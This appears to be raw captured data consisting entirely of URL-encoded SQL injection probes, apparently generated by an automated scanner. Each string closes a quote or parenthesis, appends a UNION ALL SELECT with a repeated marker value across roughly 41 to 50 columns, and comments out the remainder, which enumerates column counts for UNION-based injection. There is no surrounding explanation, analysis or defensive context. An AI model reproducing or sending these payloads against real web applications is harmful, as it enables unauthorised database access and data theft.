-8999%27%20UNION%20ALL%20SELECT%205791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791%2C5791--%20 -3799%27%20UNION%20ALL%20SELECT%206314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314%2C6314--%20 -9242%27%20UNION%20ALL%20SELECT%208537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537--%20 -6711%27%20UNION%20ALL%20SELECT%206794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794--%20 -1303%27%20UNION%20ALL%20SELECT%207897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897%2C7897--%20 -3020%27%20UNION%20ALL%20SELECT%202618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618%2C2618--%20 -5567%27%20UNION%20ALL%20SELECT%206194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194%2C6194--%20 -1497%27%20UNION%20ALL%20SELECT%205269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269%2C5269--%20 -6779%22%20UNION%20ALL%20SELECT%208383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383%2C8383--%20 -2984%22%20UNION%20ALL%20SELECT%203069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069--%20 -1779%22%20UNION%20ALL%20SELECT%204301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301%2C4301--%20 -7603%22%20UNION%20ALL%20SELECT%207907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907%2C7907--%20 -8661%22%20UNION%20ALL%20SELECT%202059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059%2C2059--%20 -5222%22%20UNION%20ALL%20SELECT%206233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233%2C6233--%20 -6869%22%20UNION%20ALL%20SELECT%209686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686%2C9686--%20 -6310%22%20UNION%20ALL%20SELECT%209514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514%2C9514--%20 -2989%22%20UNION%20ALL%20SELECT%202910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910%2C2910--%20 -6701%22%20UNION%20ALL%20SELECT%201189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189--%20 -2098%29%20UNION%20ALL%20SELECT%205499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499--%20 -1251%29%20UNION%20ALL%20SELECT%206168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168%2C6168--%20 -7796%29%20UNION%20ALL%20SELECT%205700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700%2C5700--%20 -5581%29%20UNION%20ALL%20SELECT%206487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487--%20 -2225%29%20UNION%20ALL%20SELECT%206249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249--%20 -7993%29%20UNION%20ALL%20SELECT%205596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596%2C5596--%20 -4506%29%20UNION%20ALL%20SELECT%207387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387%2C7387--%20 -1521%29%20UNION%20ALL%20SELECT%208797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797%2C8797--%20 -6325%29%20UNION%20ALL%20SELECT%205516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516%2C5516--%20 -1224%29%20UNION%20ALL%20SELECT%206715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715%2C6715--%20 -3056%29%29%20UNION%20ALL%20SELECT%204467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467--%20 -4067%29%29%20UNION%20ALL%20SELECT%207597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597%2C7597--%20 -8817%29%29%20UNION%20ALL%20SELECT%201421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421--%20 -1425%29%29%20UNION%20ALL%20SELECT%205166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166--%20 -8288%29%29%20UNION%20ALL%20SELECT%208654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654--%20 -2032%29%29%20UNION%20ALL%20SELECT%204615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615%2C4615--%20 -8454%29%29%20UNION%20ALL%20SELECT%202379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379--%20 -8840%29%29%20UNION%20ALL%20SELECT%209258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258--%20 -3445%29%29%20UNION%20ALL%20SELECT%208645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645--%20 -7829%29%29%20UNION%20ALL%20SELECT%208201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201%2C8201--%20 -8530%29%29%29%20UNION%20ALL%20SELECT%205524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524--%20 -2361%29%29%29%20UNION%20ALL%20SELECT%206698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698--%20 -8555%29%29%29%20UNION%20ALL%20SELECT%209434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434--%20 -6894%29%29%29%20UNION%20ALL%20SELECT%204081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081%2C4081--%20 -9161%29%29%29%20UNION%20ALL%20SELECT%208711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711%2C8711--%20 -3138%29%29%29%20UNION%20ALL%20SELECT%209174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174--%20 -8383%29%29%29%20UNION%20ALL%20SELECT%208443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443%2C8443--%20 -7591%29%29%29%20UNION%20ALL%20SELECT%207938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938%2C7938--%20 -3509%29%29%29%20UNION%20ALL%20SELECT%201154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154--%20 -9374%29%29%29%20UNION%20ALL%20SELECT%207875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875--%20 -7915%20UNION%20ALL%20SELECT%207903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903%2C7903--%20 -5515%20UNION%20ALL%20SELECT%202369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369%2C2369--%20 -7726%20UNION%20ALL%20SELECT%206258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258--%20 -5960%20UNION%20ALL%20SELECT%205196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196%2C5196--%20 -7289%20UNION%20ALL%20SELECT%201129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129%2C1129--%20 -1729%20UNION%20ALL%20SELECT%201319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319--%20 -1884%20UNION%20ALL%20SELECT%204219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219%2C4219--%20 -9355%20UNION%20ALL%20SELECT%208199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199--%20 -6532%20UNION%20ALL%20SELECT%201708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708%2C1708--%20 -4804%20UNION%20ALL%20SELECT%206250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250%2C6250--%20 -4382%27%29%20UNION%20ALL%20SELECT%206018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018%2C6018--%20 